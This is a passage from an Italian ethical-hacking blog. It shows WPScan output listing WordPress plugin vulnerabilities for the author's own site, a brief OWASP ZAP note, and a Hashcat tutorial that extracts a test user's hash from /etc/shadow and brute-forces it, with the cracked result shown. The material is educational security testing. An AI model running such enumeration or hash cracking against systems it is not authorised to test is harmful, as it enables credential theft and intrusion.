 | [!] Title: WP Super Cache 1.3 - trunk/plugins/wptouch.php URI XSS
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6625
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
 |
 | [!] Title: WP Super Cache 1.3 - trunk/plugins/searchengine.php URI XSS
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6626
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
 |
 | [!] Title: WP Super Cache 1.3 - trunk/plugins/domain-mapping.php URI XSS
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6627
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
 |
 | [!] Title: WP Super Cache 1.3 - trunk/plugins/badbehaviour.php URI XSS
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6628
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
 |
 | [!] Title: WP Super Cache 1.3 - trunk/plugins/awaitingmoderation.php URI XSS
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6629
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
 |
 | [!] Title: WP Super Cache <= 1.4.2 - Stored Cross-Site Scripting (XSS)
 |     Fixed in: 1.4.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/7889
 |      - http://blog.sucuri.net/2015/04/security-advisory-persistent-xss-in-wp-super-cache.html
 |
 | [!] Title: WP Super Cache <= 1.4.4 - Cross-Site Scripting (XSS)
 |     Fixed in: 1.4.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8197
 |      - http://z9.io/2015/09/25/wp-super-cache-1-4-5/
 |
 | [!] Title: WP Super Cache <= 1.4.4 - PHP Object Injection
 |     Fixed in: 1.4.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8198
 |      - http://z9.io/2015/09/25/wp-super-cache-1-4-5/
 |
 | The version could not be determined.

[+] Finished: Sat Jan 19 17:11:02 2019
[+] Requests Done: 28
[+] Cached Requests: 6
[+] Data Sent: 4.73 KB
[+] Data Received: 679.634 KB
[+] Memory used: 67.156 MB
[+] Elapsed time: 00:00:10
:~ #

Enumerate p serve per vedere i plugin installati. La soluzione è nascondere le traccie dei plugin dal codice HTML, cambiare il nome della cartella wp-content, usarne il meno possibile e aggiornarli regolarmente.

Scoprire il tema WordPress in uso con WPScan

# wpscan --force --url https://christeninformatica.ch --enumerate t
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.4.3
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: https://christeninformatica.ch/
[+] Started: Sat Jan 19 17:26:06 2019

Interesting Finding(s):

[+] https://christeninformatica.ch/
 | Interesting Entry: Server: Apache
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] https://christeninformatica.ch/robots.txt
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 5.0.3 identified (Latest, released on 2019-01-09).
 | Detected By: Rss Generator (Aggressive Detection)
 |  - https://christeninformatica.ch/feed/, https://wordpress.org/?v=5.0.3
 |  - https://christeninformatica.ch/comments/feed/, https://wordpress.org/?v=5.0.3

[i] The main theme could not be detected.

[+] Enumerating Most Popular Themes
 Checking Known Locations - Time: 00:01:31 <===============================================================================================================================================================================================> (411 / 411) 100.00% Time: 00:01:31

[i] No themes Found.

[+] Finished: Sat Jan 19 17:27:45 2019
[+] Requests Done: 438
[+] Cached Requests: 4
[+] Data Sent: 70.294 KB
[+] Data Received: 4.764 MB
[+] Memory used: 47.598 MB
[+] Elapsed time: 00:01:39
:~ # 

Da questo esempio si nota l'importanza di non usare temi troppo popolari e se si usano, di aggiornarli il più spesso possibile.

Testare la sicurezza del proprio sito/sever con Owasp ZAP

Owasp ZAP è un programma per testare la sicurezza del proprio server/sito. È semplice da usare basta inserire la URL della propria pagina nel campo “URL to attack” e cliccare su Attack.

Una volta finito controllare sotto “Avvisi” per vedere che falle della sicurezza sono state trovate, fare ricerche sul come risolvere i problemi e poi rimediare.

OWASP ZAP - Sicurezza WordPress Penetration testing

└ Tags: ethical hacking, guida, italiano, Kali Linux, linux, OWASP ZAP, penetration test, security, server, Sicurezza, sito, tutorial, Wordpress, wpscan
 Comment 

Craccare password con Hashcat Brute Force

Gen16
on 16 Gennaio 2019 at 18:31
Posted In: Ethical Hacking / Penetration Testing, Sicurezza / Anonimato

Guida in italiano sul come “craccare” password con Hashcat usando un attacco Brute Force. Hashcat è un tool molto sofisticato che viene usato per decriptare hashes. È il password cracker più veloce in circolazione anche per via del fatto che sfrutta il GPU della scheda grafica per velocizzare il processo. Con Hashcat si può “crackare” qualsiasi password, anche di WordPress per esempio, basta procurarsi l’hash file per poi “craccarlo” tranquillamente offline.

Chiaramente tool del genere possono venire usati in modo legittimo per testare la sicurezza delle password o recuperare una password come anche no.

Identificare un algoritmo hashing

Per “crackare” un hash file bisogna prima sapere che tipo di Algoritmo Hashing è stato usato. Per capirlo è facile, basta osservare i primi due caratteri del codice, vedi tabella sottostante.

SimboloAlgoritmo Hashing
$0DES
$1MD5 Hashing
$2Blowfish
$2AEksblowfish
$5SHA256
$6SHA512

Se il codice inizia con $6 vuol dire che l’algoritmo usato è SHA512. Ci sono anche dei programmi come per esempio hashid che possono essere utili nell’identificare il tipo di “algoritmo hashing”.

Eseguire il comando “hashcat –help” e dare un occhiata sotto “Hash modes“, c’è un lista di numeri di identificazione da usare. Nel nostro esempio – craccare password di sistema Linux con Hashcat – il numero da usare è 1800.

  15900 | DPAPI masterkey file v2                          | Operating Systems
  12800 | MS-AzureSync  PBKDF2-HMAC-SHA256                 | Operating Systems
   1500 | descrypt, DES (Unix), Traditional DES            | Operating Systems
  12400 | BSDi Crypt, Extended DES                         | Operating Systems
    500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)        | Operating Systems
   3200 | bcrypt $2*$, Blowfish (Unix)                     | Operating Systems
   7400 | sha256crypt $5$, SHA256 (Unix)                   | Operating Systems
   1800 | sha512crypt $6$, SHA512 (Unix)                   | Operating Systems
    122 | macOS v10.4, MacOS v10.5, MacOS v10.6            | Operating Systems
   1722 | macOS v10.7                                      | Operating Systems
   7100 | macOS v10.8+ (PBKDF2-SHA512)                     | Operating Systems
   6300 | AIX {smd5}                                       | Operating Systems
   6700 | AIX {ssha1}                                      | Operating Systems

Modalità di attacco di Hashcat

NumeroDescrizione modalità attacco
0Attacco a vocabolario
1Combinazione
3Attacco Brute Force
6Attacco ibrido

Set di caratteri e maschera

Set di caratteri per Hashcat

Il set di caratteri da usare comprende lettere minuscole, lettere maiuscole, numeri e simboli. Vedi tabella sottostante:

  ? | Charset
 ===+=========
  l | abcdefghijklmnopqrstuvwxyz
  u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
  d | 0123456789
  s |  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
  a | ?l?u?d?s
  b | 0x00 - 0xff

Quindi per “crackare” una password che si sospetta sia composta da sole lettere minuscole, usare ?l, per lettere maiuscole ?u, per i numeri ?d eccetera. Se si vuole “craccare” una password composta da lettere minuscole, lettere maiuscole e numeri usare per esempio “-1 ?l?u?d ?1?1?1?1”. Se si vuole usare tutti i caratteri possibili usare ?a.

Maschera Hashcat

La maschera serve per definire il numero di caratteri della password da “craccare” come anche il tipo di caratteri da usare.

Un esempio di maschera per una password composta da 4 lettere minuscole potrebbe essere questo: ?l?l?l?l.

Craccare password di sistema Linux con Hashcat

In questo esempio sul come “crackare” password di sistema Linux con Hashcat come prima cosa creo un utente test.

:~ # useradd testuser
:~ # passwd testuser
Nuova password: 
PASSWORD ERRATA: è troppo corta
PASSWORD ERRATA: è troppo semplice
Reimmettere la nuova password: 
passwd: password aggiornata correttamente
:~ #

Il prossimo passo e creare un “hash file”. Le password in sistemi Linux sono contenute in modo criptato nel file /etc/shadow, nei sistemi moderni usando l’Hashing Algorithm” SHA512.

Ora per creare il file che ci serve dobbiamo estrarre questa informazione – la hash della password – dal file /etc/shadow con il seguente comando:

:~ # tail -n1 /etc/shadow 
testuser:$6$3jszVVeWR0jP6Bpr$eVtWKvj3KjQXUvIpz286QNRl1bs5EAcq6gBG.z.TvbJVjYetM0byqyb7rwFKQwkYnIag80QF4HqUBreIhY0Mz1:17911:0:99999:7:::
:~ # tail -n1 /etc/shadow > testuser.hash

Una volta creato l'”hash file” si può procedere. Per craccare la password contenuta nel file eseguire il seguente comando:

:~ # hashcat -m 1800 -a 3 testuser.hash ?l?l?l?l?l
hashcat (v3.00) starting...

OpenCL Platform #1: NVIDIA Corporation  
======================================
- Device #1: GeForce GTX 460, 240/963 MB allocatable, 7MCU

Hashes: 1 hashes; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Applicable Optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
* Brute-Force
* Uses-64-Bit
Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 75c

[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit => s

Session.Name...: hashcat
Status.........: Running
Input.Mode.....: Mask (?l?l?l?l?l) [5]
Hash.Target....: $6$3jszVVeWR0jP6Bpr$eVtWKvj3KjQXUvIpz286Q...
Hash.Type......: sha512crypt, SHA512(Unix)
Time.Started...: Tue Jan 15 21:02:08 2019 (29 secs)
Time.Estimated.: Tue Jan 15 21:28:50 2019 (26 mins, 7 secs)
Speed.Dev.#1...:     7444 H/s (11.61ms)
Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.......: 215040/11881376 (1.81%)
Rejected.......: 0/215040 (0.00%)
Restore.Point..: 0/456976 (0.00%)
HWMon.Dev.#1...: Temp: 60c Fan: 39%

$6$3jszVVeWR0jP6Bpr$eVtWKvj3KjQXUvIpz286QNRl1bs5EAcq6gBG.z.TvbJVjYetM0byqyb7rwFKQwkYnIag80QF4HqUBreIhY0Mz1:prova
                                                          
Session.Name...: hashcat
Status.........: Cracked
Input.Mode.....: Mask (?l?l?l?l?l) [5]
Hash.Target....: $6$3jszVVeWR0jP6Bpr$eVtWKvj3KjQXUvIpz286Q...
Hash.Type......: sha512crypt, SHA512(Unix)
Time.Started...: Tue Jan 15 21:02:08 2019 (2 mins, 23 secs)
Speed.Dev.#1...:     7469 H/s (11.59ms)
Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.......: 1075200/11881376 (9.05%)
Rejected.......: 0/1075200 (0.00%)
Restore.Point..: 35840/456976 (7.84%)

Started: Tue Jan 15 21:02:08 2019
Stopped: Tue Jan 15 21:04:38 2019 
:~ # 
└ Tags: Crackare, decodificare, decriptare, guida, hash file, hashes, italiano, Password, Password Cracker, recuperare, Sicurezza, testare
 Comment 
  • Page 1 of 6
  • 1
  • 2
  • 3
  • 4
  • 5
  • »
  • Last »

Articoli recenti

  • Hacking WordPress – Content Injection Exploit e DoS
  • Ethical Hacking – Metasploit, Msfvenom e Meterpreter
  • Ethical Hacking – Testare la sicurezza – Nmap e Metasploit
  • Sicurezza WordPress – Penetration test con Kali Linux
  • Craccare password con Hashcat Brute Force

Commenti recenti

  • Marco su Compilare il Kernel di Linux openSUSE
  • chitblog su La perfetta installazione WordPress – Sicurezza
  • chitblog su La perfetta installazione WordPress – Sicurezza
  • Andrea su La perfetta installazione WordPress – Sicurezza

Categorie

  • Ethical Hacking / Penetration Testing
  • LINUX SERVER
  • openSUSE
  • SEO / ANALYTICS / WEBMASTER
  • Sicurezza / Anonimato
  • VARIO
  • WordPress

Archivi

  • Maggio 2019
  • Marzo 2019
  • Gennaio 2019
  • Giugno 2018
  • Maggio 2018
  • Aprile 2018
  • Marzo 2018
  • Febbraio 2018
  • Ottobre 2017
  • Giugno 2016
  • Novembre 2015
  • Agosto 2015
  • Giugno 2015
  • Aprile 2015
  • Marzo 2015
  • Maggio 2014
  • Gennaio 2014
  • Dicembre 2013
  • Ottobre 2013
  • Luglio 2013
  • Giugno 2013